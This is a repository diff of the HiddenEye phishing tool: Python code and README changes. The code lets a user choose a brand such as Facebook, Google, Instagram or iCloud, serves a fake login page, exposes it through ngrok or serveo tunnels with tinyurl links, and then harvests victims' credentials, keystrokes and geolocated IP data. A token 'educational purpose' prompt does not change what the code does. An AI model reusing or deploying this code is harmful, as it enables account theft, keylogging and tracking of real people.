didBackground = False
|
|
||||||
if didBackground:
|
|
||||||
logFile = open("log.txt", "w")
|
|
||||||
|
|
||||||
|
|
||||||
def log(ctx): #Writing log
|
|
||||||
if didBackground: #if didBackground == True, write
|
|
||||||
logFile.write(ctx.replace(RED, "").replace(WHITE, "").replace(CYAN, "").replace(GREEN, "").replace(DEFAULT, "") + "\n")
|
|
||||||
print(ctx)
|
|
||||||
|
|
||||||
|
|
||||||
def waitCreds():
|
|
||||||
print("{0}[{1}*{0}]{1} Looks Like Everything is Ready. Now Feel The Power.".format(CYAN, DEFAULT))
|
|
||||||
print("{0}[{1}*{0}]{1} KEEP EYE ON HIDDEN WORLD WITH DARKSEC.".format(RED, DEFAULT))
|
|
||||||
print("{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n".format(CYAN, DEFAULT))
|
|
||||||
while True:
|
|
||||||
with open('Server/www/usernames.txt') as creds:
|
|
||||||
lines = creds.read().rstrip()
|
|
||||||
if len(lines) != 0:
|
|
||||||
log('======================================================================'.format(RED, DEFAULT))
|
|
||||||
log(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
|
|
||||||
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
|
|
||||||
log('======================================================================'.format(RED, DEFAULT))
|
|
||||||
log(' {0}***** I KNOW YOU ARE ENJOYING. SO MAKE IT POPULAR TO GET MORE FEATURES *****{1}\n {0}{1}'.format(RED, DEFAULT))
|
|
||||||
|
|
||||||
creds.close()
|
|
||||||
|
|
||||||
|
|
||||||
with open('Server/www/ip.txt') as creds:
|
|
||||||
lines = creds.read().rstrip()
|
|
||||||
if len(lines) != 0:
|
|
||||||
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
|
|
||||||
resp = urlopen('https://ipinfo.io/%s/json' % ip)
|
|
||||||
ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
|
|
||||||
if 'bogon' in ipinfo:
|
|
||||||
log('======================================================================'.format(RED, DEFAULT))
|
|
||||||
log(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
|
|
||||||
else:
|
|
||||||
matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
|
|
||||||
latitude = matchObj.group(1)
|
|
||||||
longitude = matchObj.group(2)
|
|
||||||
log('======================================================================'.format(RED, DEFAULT))
|
|
||||||
log(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
|
|
||||||
log(' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, DEFAULT) % (longitude, latitude))
|
|
||||||
log(' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['org'], ipinfo['country']))
|
|
||||||
log(' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['region'], ipinfo['city']))
|
|
||||||
system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
|
|
||||||
log('======================================================================'.format(RED, DEFAULT))
|
|
||||||
|
|
||||||
creds.close()
|
|
||||||
|
|
||||||
with open('Server/www/KeyloggerData.txt') as creds:
|
|
||||||
lines = creds.read().rstrip()
|
|
||||||
if len(lines) != 0:
|
|
||||||
log('______________________________________________________________________'.format(RED, DEFAULT))
|
|
||||||
log(' {0}[KEY PRESSED ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
|
|
||||||
system('rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt')
|
|
||||||
log('______________________________________________________________________'.format(RED, DEFAULT))
|
|
||||||
|
|
||||||
|
|
||||||
creds.close()
|
|
||||||
|
|
||||||
|
|
||||||
def runPEnv(): #menu where user select what they wanna use
|
|
||||||
system('clear')
|
|
||||||
print ('''
|
|
||||||
______________________________________________________________
|
|
||||||
------>{2} HIDDEN EYE {2}<-------
|
|
||||||
{0}KEEP EYE ON HIDDEN WORLD WITH DARKSEC.
|
|
||||||
|
|
||||||
{0}[ LIVE VICTIM ATTACK INFORMATION ]
|
|
||||||
{0}[ LIVE KEYSTROKES CAN BE CAPTURED ]
|
|
||||||
_______________________________________________________________
|
|
||||||
{1}'''.format(GREEN, DEFAULT, CYAN))
|
|
||||||
|
|
||||||
|
|
||||||
if 256 != system('which php'): #Checking if user have PHP
|
|
||||||
print (" -----------------------".format(CYAN, DEFAULT))
|
|
||||||
print ("[PHP INSTALLATION FOUND]".format(CYAN, DEFAULT))
|
|
||||||
print (" -----------------------".format(CYAN, DEFAULT))
|
|
||||||
else:
|
|
||||||
print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run HiddenEye again.http://www.php.net/".format(RED, DEFAULT))
|
|
||||||
exit(0)
|
|
||||||
|
|
||||||
for i in range(101):
|
|
||||||
sleep(0.05)
|
|
||||||
stdout.write("\r{0}[{1}*{0}]{1} Eye is Opening. Please Wait... %d%%".format(CYAN, DEFAULT) % i)
|
|
||||||
stdout.flush()
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
if input(" \n\n{0}[{1}!{0}]{1} DO YOU AGREE TO USE THIS TOOL FOR EDUCATIONAL PURPOSE ? (y/n)\n\n{2}[HIDDENEYE-DARKSEC]- > {1}".format(RED, DEFAULT, CYAN)).upper() != 'Y': #Question where user must accept education purposes
|
|
||||||
system('clear')
|
|
||||||
print ('\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n\n'.format(RED, DEFAULT))
|
|
||||||
exit(0)
|
|
||||||
|
|
||||||
option = input("\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
|
|
||||||
if option == '1':
|
|
||||||
loadModule('Facebook')
|
|
||||||
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
|
|
||||||
runPhishing('Facebook', option2)
|
|
||||||
elif option == '2':
|
|
||||||
loadModule('Google')
|
|
||||||
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
|
|
||||||
runPhishing('Google', option2)
|
|
||||||
elif option == '3':
|
|
||||||
loadModule('LinkedIn')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('LinkedIn', option2)
|
|
||||||
elif option == '4':
|
|
||||||
loadModule('GitHub')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('GitHub', option2)
|
|
||||||
elif option == '5':
|
|
||||||
loadModule('StackOverflow')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('StackOverflow', option2)
|
|
||||||
elif option == '6':
|
|
||||||
loadModule('WordPress')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('WordPress', option2)
|
|
||||||
elif option == '7':
|
|
||||||
loadModule('Twitter')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('Twitter', option2)
|
|
||||||
elif option == '8':
|
|
||||||
loadModule('Instagram')
|
|
||||||
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
|
|
||||||
runPhishing('Instagram', option2)
|
|
||||||
elif option == '9':
|
|
||||||
loadModule('Snapchat')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('Snapchat', option2)
|
|
||||||
elif option == '10':
|
|
||||||
loadModule('Yahoo')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('Yahoo', option2)
|
|
||||||
elif option == '11':
|
|
||||||
loadModule('Twitch')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('Twitch', option2)
|
|
||||||
elif option == '12':
|
|
||||||
loadModule('Microsoft')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('Microsoft', option2)
|
|
||||||
elif option == '13':
|
|
||||||
loadModule('Steam')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('Steam', option2)
|
|
||||||
elif option == '14':
|
|
||||||
loadModule('VK')
|
|
||||||
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
|
|
||||||
runPhishing('VK', option2)
|
|
||||||
elif option == '15':
|
|
||||||
loadModule('iCloud')
|
|
||||||
option2 = ''
|
|
||||||
runPhishing('iCloud', option2)
|
|
||||||
else:
|
|
||||||
|
|
||||||
system('clear && ./HiddenEye.py')
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
def runServeo():
|
|
||||||
system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > link.url 2> /dev/null &')
|
|
||||||
sleep(7)
|
|
||||||
with open('link.url') as creds:
|
|
||||||
lines = creds.read().rstrip()
|
|
||||||
if len(lines) != 0:
|
|
||||||
pass
|
|
||||||
else:
|
|
||||||
runServeo()
|
|
||||||
output = check_output("grep -o 'https://[0-9a-z]*\.serveo.net' link.url", shell=True)
|
|
||||||
url = str(output).strip("b ' \ n")
|
|
||||||
print("\n {0}[{1}*{0}]{1} SERVEO URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN))
|
|
||||||
link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
|
|
||||||
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN))
|
|
||||||
print("\n")
|
|
||||||
|
|
||||||
def runNgrok():
|
|
||||||
system('./Server/ngrok http 1111 > /dev/null &')
|
|
||||||
while True:
|
|
||||||
sleep(2)
|
|
||||||
system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url')
|
|
||||||
urlFile = open('ngrok.url', 'r')
|
|
||||||
url = urlFile.read()
|
|
||||||
urlFile.close()
|
|
||||||
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
|
|
||||||
print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN))
|
|
||||||
link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
|
|
||||||
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN))
|
|
||||||
print("\n")
|
|
||||||
break
|
|
||||||
|
|
||||||
|
|
||||||
def runServer():
|
|
||||||
system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
try:
|
try:
|
||||||
runPEnv()
|
runMainMenu()
|
||||||
def custom(): #Question where user can input custom web-link
|
|
||||||
print("\n (Choose Wisely As Your Victim Will Redirect to This Link)".format(RED, DEFAULT))
|
inputCustom()
|
||||||
print("\n (Leave Blank To Loop The Phishing Page)".format(RED, DEFAULT))
|
##############
|
||||||
print("\n {0}Insert a custom redirect url:".format(CYAN, DEFAULT))
|
selectServer()
|
||||||
custom = input("\nCUSTOM URL >".format(CYAN, DEFAULT))
|
|
||||||
if 'https://' in custom:
|
|
||||||
pass
|
|
||||||
else:
|
|
||||||
custom = 'https://' + custom
|
|
||||||
if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'):
|
|
||||||
with open('Server/www/login.php') as f:
|
|
||||||
read_data = f.read()
|
|
||||||
c = read_data.replace('<CUSTOM>', custom)
|
|
||||||
f = open('Server/www/login.php', 'w')
|
|
||||||
f.write(c)
|
|
||||||
f.close()
|
|
||||||
with open('Server/www/post.php') as f:
|
|
||||||
read_data = f.read()
|
|
||||||
c = read_data.replace('<CUSTOM>', custom)
|
|
||||||
f = open('Server/www/post.php', 'w')
|
|
||||||
f.write(c)
|
|
||||||
f.close()
|
|
||||||
else:
|
|
||||||
with open('Server/www/login.php') as f:
|
|
||||||
read_data = f.read()
|
|
||||||
c = read_data.replace('<CUSTOM>', custom)
|
|
||||||
f = open('Server/www/login.php', 'w')
|
|
||||||
f.write(c)
|
|
||||||
f.close()
|
|
||||||
custom()
|
|
||||||
def server(): #Question where user must select server
|
|
||||||
print("\n {0}Please select any available server:{1}".format(CYAN, DEFAULT))
|
|
||||||
print("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo".format(CYAN, DEFAULT))
|
|
||||||
choice = input(" \n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
|
|
||||||
if choice == '1':
|
|
||||||
runNgrok()
|
|
||||||
elif choice == '2':
|
|
||||||
runServeo()
|
|
||||||
else:
|
|
||||||
system('clear')
|
|
||||||
return server()
|
|
||||||
server()
|
|
||||||
multiprocessing.Process(target=runServer).start()
|
multiprocessing.Process(target=runServer).start()
|
||||||
waitCreds()
|
getCredentials()
|
||||||
|
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
end()
|
endMessage()
|
||||||
exit(0)
|
exit(0)
|
||||||
|
|
|
@ -37,7 +37,9 @@
|
||||||
|
|
||||||
* **Black Arch**
|
* **Black Arch**
|
||||||
|
|
||||||
|
|
||||||
## HOW TO INSTALL
|
## HOW TO INSTALL
|
||||||
|
|
||||||
### CLONE
|
### CLONE
|
||||||
```
|
```
|
||||||
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
|
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
|
||||||
|
@ -143,7 +145,7 @@ or
|
||||||
./HiddenEye.py
|
./HiddenEye.py
|
||||||
|
|
||||||
```
|
```
|
||||||
### Running (One Code installation in termux)
|
### Running (One Code installation in Termux)
|
||||||
|
|
||||||
|
|
||||||
```
|
```
|
||||||
|
@ -249,6 +251,10 @@ pkg install git python php curl openssh grep && pip3 install wget && git clone h
|
||||||
**9) ICLOUD PHISHING:**
|
**9) ICLOUD PHISHING:**
|
||||||
- Traditional iCloud Web Login Page
|
- Traditional iCloud Web Login Page
|
||||||
</p>
|
</p>
|
||||||
|
|
||||||
|
### SCREENSHOT
|
||||||
|
![Shot](https://github.com/DarkSecDevelopers/HiddenEye/blob/dev/Sceenshot.png)
|
||||||
|
|
||||||
## DISCLAIMER
|
## DISCLAIMER
|
||||||
<p align="center">
|
<p align="center">
|
||||||
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
|
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
|
||||||
|
@ -258,3 +264,4 @@ The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
BIN
Sceenshot.png
Normal file
BIN
Sceenshot.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 77 KiB |
Loading…
Reference in New Issue
Block a user